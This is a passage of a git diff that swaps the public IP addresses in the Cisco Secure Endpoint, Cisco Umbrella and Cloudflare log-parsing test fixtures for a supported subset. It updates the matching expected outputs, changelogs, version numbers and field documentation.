Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3990,7 +3990,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index f93ff929af0..6d67c67a9d9 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_secure_endpoint title: Cisco Secure Endpoint (AMP) -version: 0.2.0 +version: 0.2.1 license: basic description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent. type: integration diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index 1ebeb7d81eb..42403e4c385 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log index 3e5f23fced2..4d6b02fde1b 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log @@ -1,2 +1,2 @@ -2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,ALLOW -2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,BLOCK +2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW +2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json index ea95f0102ae..cbdc4dc63e4 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json @@ -2,23 +2,8 @@ "expected": [ { "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 36692, - "organization": { - "name": "Cisco OpenDNS, LLC" - } - }, - "address": "146.112.255.129", - "ip": "146.112.255.129" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "rule": { "id": "12" @@ -32,7 +17,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9s/mgn3WChavy6kpCk25Ed4VCcU=", + "community_id": "1:7y0Rtnc087ycVA+d/fCa/8i5fTo=", "transport": "1", "direction": "outbound" }, @@ -47,12 +32,12 @@ "related": { "ip": [ "172.17.3.4", - "146.112.255.129" + "67.43.156.12" ] }, "event": { - "ingested": "2021-09-13T18:11:30.813569215Z", - "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,ALLOW", + "ingested": "2021-12-09T13:36:00.078901200Z", + "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW", "category": "network", "type": [ "allowed" @@ -71,23 +56,8 @@ }, { "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 36692, - "organization": { - "name": "Cisco OpenDNS, LLC" - } - }, - "address": "146.112.255.129", - "ip": "146.112.255.129" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "rule": { "id": "12" @@ -101,7 +71,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9s/mgn3WChavy6kpCk25Ed4VCcU=", + "community_id": "1:7y0Rtnc087ycVA+d/fCa/8i5fTo=", "transport": "1", "direction": "inbound" }, @@ -116,12 +86,12 @@ "related": { "ip": [ "172.17.3.4", - "146.112.255.129" + "67.43.156.12" ] }, "event": { - "ingested": "2021-09-13T18:11:30.813573577Z", - "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,146.112.255.129,,ams1.edc,12,BLOCK", + "ingested": "2021-12-09T13:36:00.078910500Z", + "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK", "category": "network", "type": [ "denied" diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log index d777bb1c175..aa271ad3d86 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log @@ -1,3 +1,3 @@ -"2020-07-23 23:49:54","elasticuser","elasticuser2,some other identity","192.168.1.1","8.8.8.8","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType","" -"2020-07-23 23:50:25","elasticuser","elasticuser2,some other identity","192.168.1.1","4.4.4.4","Blocked","1 (A)","NOERROR","elastic.co.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories" -"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","1.1.1.1","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users","" +"2020-07-23 23:49:54","elasticuser","elasticuser2,some other identity","192.168.1.1","81.2.69.144","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType","" +"2020-07-23 23:50:25","elasticuser","elasticuser2,some other identity","192.168.1.1","67.43.156.12","Blocked","1 (A)","NOERROR","elastic.co.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories" +"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","67.43.156.12","81.2.69.144","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users","" diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index 4edff94c925..34b09248e46 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json @@ -11,22 +11,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "source": { "address": "192.168.1.1", @@ -50,13 +53,13 @@ ], "ip": [ "192.168.1.1", - "8.8.8.8" + "81.2.69.144" ] }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-09-13T18:11:31.669497542Z", - "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"8.8.8.8\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", + "ingested": "2021-12-09T13:36:00.307612100Z", + "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "category": "network", "type": [ "allowed", @@ -89,23 +92,8 @@ "response_code": "NOERROR" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, - "address": "4.4.4.4", - "ip": "4.4.4.4" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "source": { "address": "192.168.1.1", @@ -129,13 +117,13 @@ ], "ip": [ "192.168.1.1", - "4.4.4.4" + "67.43.156.12" ] }, "event": { "action": "dns-request-Blocked", - "ingested": "2021-09-13T18:11:31.669502149Z", - "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"4.4.4.4\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", + "ingested": "2021-12-09T13:36:00.307621100Z", + "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "category": "network", "type": [ "denied", @@ -170,40 +158,28 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.2.2.2", - "ip": "2.2.2.2" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "source": { - "geo": { - "continent_name": "Oceania", - "country_name": "Australia", - "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" - }, - "as": { - "number": 13335, - "organization": { - "name": "Cloudflare, Inc." - } - }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "tags": [ "preserve_original_event" @@ -225,14 +201,14 @@ "elastic.co." ], "ip": [ - "1.1.1.1", - "2.2.2.2" + "67.43.156.12", + "81.2.69.144" ] }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-09-13T18:11:31.669504232Z", - "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"1.1.1.1\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", + "ingested": "2021-12-09T13:36:00.307627300Z", + "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "category": "network", "type": [ "allowed", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log index 6200aeab3ae..927fc2bdb88 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log @@ -1,2 +1,2 @@ -"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","8.8.8.8","0","Test Category" -"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","8.8.8.8","445","Test Category" +"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","81.2.69.144","0","Test Category" +"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","81.2.69.144","445","Test Category" diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 463e9c9a8dc..41f801dd7e7 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json @@ -3,23 +3,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 0, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "source": { "port": 0, @@ -41,13 +44,13 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "81.2.69.144" ] }, "event": { "category": "network", - "ingested": "2021-09-13T18:11:32.966577603Z", - "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"8.8.8.8\",\"0\",\"Test Category\"" + "ingested": "2021-12-09T13:36:00.633448800Z", + "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" }, "cisco": { "umbrella": { @@ -61,23 +64,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 445, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "source": { "port": 61095, @@ -99,13 +105,13 @@ "related": { "ip": [ "192.168.1.1", - "8.8.8.8" + "81.2.69.144" ] }, "event": { "category": "network", - "ingested": "2021-09-13T18:11:32.966582547Z", - "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"8.8.8.8\",\"445\",\"Test Category\"" + "ingested": "2021-12-09T13:36:00.633453600Z", + "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\"" }, "cisco": { "umbrella": { diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log index 8cea4bb5599..13779918db7 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log @@ -1,3 +1,3 @@ -"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers","" -"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers","" -"2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.192.192.135","1.1.1.91","","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","","","Networks" \ No newline at end of file +"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","67.43.156.12","81.2.69.144","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers","" +"2020-07-23 23:48:56","elasticuser","someotheruser","192.168.1.1","67.43.156.12","81.2.69.144","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers","" +"2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.168.192.135","67.43.156.12","","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","","","Networks" \ No newline at end of file diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index 902dbf2110f..0cfea734175 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -3,26 +3,29 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "source": { "nat": { - "ip": "1.1.1.1" + "ip": "67.43.156.12" }, "address": "192.168.1.1", "ip": "192.168.1.1" @@ -52,8 +55,8 @@ ], "ip": [ "192.168.1.1", - "1.1.1.1", - "8.8.8.8" + "67.43.156.12", + "81.2.69.144" ] }, "http": { @@ -66,8 +69,8 @@ } }, "event": { - "ingested": "2021-09-13T18:11:33.789721418Z", - "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", + "ingested": "2021-12-09T13:36:00.832430Z", + "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "category": "network", "type": [ "allowed" @@ -100,26 +103,29 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "source": { "nat": { - "ip": "1.1.1.1" + "ip": "67.43.156.12" }, "address": "192.168.1.1", "ip": "192.168.1.1" @@ -149,8 +155,8 @@ ], "ip": [ "192.168.1.1", - "1.1.1.1", - "8.8.8.8" + "67.43.156.12", + "81.2.69.144" ] }, "http": { @@ -163,8 +169,8 @@ } }, "event": { - "ingested": "2021-09-13T18:11:33.789726566Z", - "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", + "ingested": "2021-12-09T13:36:00.832441Z", + "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "category": "network", "type": [ "denied" @@ -197,25 +203,10 @@ { "source": { "nat": { - "ip": "1.1.1.91" - }, - "geo": { - "continent_name": "Asia", - "country_name": "Taiwan", - "location": { - "lon": 121.0, - "lat": 23.5 - }, - "country_iso_code": "TW" - }, - "as": { - "number": 17713, - "organization": { - "name": "National Sun Yat-sen University" - } + "ip": "67.43.156.12" }, - "address": "192.192.192.135", - "ip": "192.192.192.135" + "address": "192.168.192.135", + "ip": "192.168.192.135" }, "url": { "path": "/the.js", @@ -242,8 +233,8 @@ "" ], "ip": [ - "192.192.192.135", - "1.1.1.91" + "192.168.192.135", + "67.43.156.12" ] }, "http": { @@ -257,8 +248,8 @@ } }, "event": { - "ingested": "2021-09-13T18:11:33.789728631Z", - "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.192.192.135\",\"1.1.1.91\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"", + "ingested": "2021-12-09T13:36:00.832447300Z", + "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"", "category": "network", "type": [ "allowed" diff --git a/packages/cisco_umbrella/data_stream/log/fields/ecs.yml b/packages/cisco_umbrella/data_stream/log/fields/ecs.yml index f4e8e83c499..e38c9a3e6ea 100644 --- a/packages/cisco_umbrella/data_stream/log/fields/ecs.yml +++ b/packages/cisco_umbrella/data_stream/log/fields/ecs.yml @@ -24,6 +24,10 @@ name: destination.geo.country_name - external: ecs name: destination.geo.continent_name +- external: ecs + name: destination.geo.region_iso_code +- external: ecs + name: destination.geo.region_name - external: ecs name: destination.geo.country_iso_code - description: Longitude and latitude. diff --git a/packages/cisco_umbrella/docs/README.md b/packages/cisco_umbrella/docs/README.md index 218d0eafdca..f84172c87f9 100644 --- a/packages/cisco_umbrella/docs/README.md +++ b/packages/cisco_umbrella/docs/README.md @@ -162,6 +162,8 @@ An example event for `log` looks as following: | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | | destination.geo.location | Longitude and latitude. | geo_point | +| destination.geo.region_iso_code | Region ISO code. | keyword | +| destination.geo.region_name | Region name. | keyword | | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.mac | MAC address of the destination. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword | | destination.nat.ip | Translated ip of destination based NAT sessions (e.g. internet to private DMZ) Typically used with load balancers, firewalls, or routers. | ip | diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index a53ba172c3a..4111e9894d2 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_umbrella title: Cisco Umbrella -version: 0.3.0 +version: 0.3.1 license: basic description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml index 3a351a94e70..6e0b26f2179 100644 --- a/packages/cloudflare/changelog.yml +++ b/packages/cloudflare/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log index 91cd1759124..86741ca575b 100644 --- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log +++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log @@ -1,3 +1,3 @@ 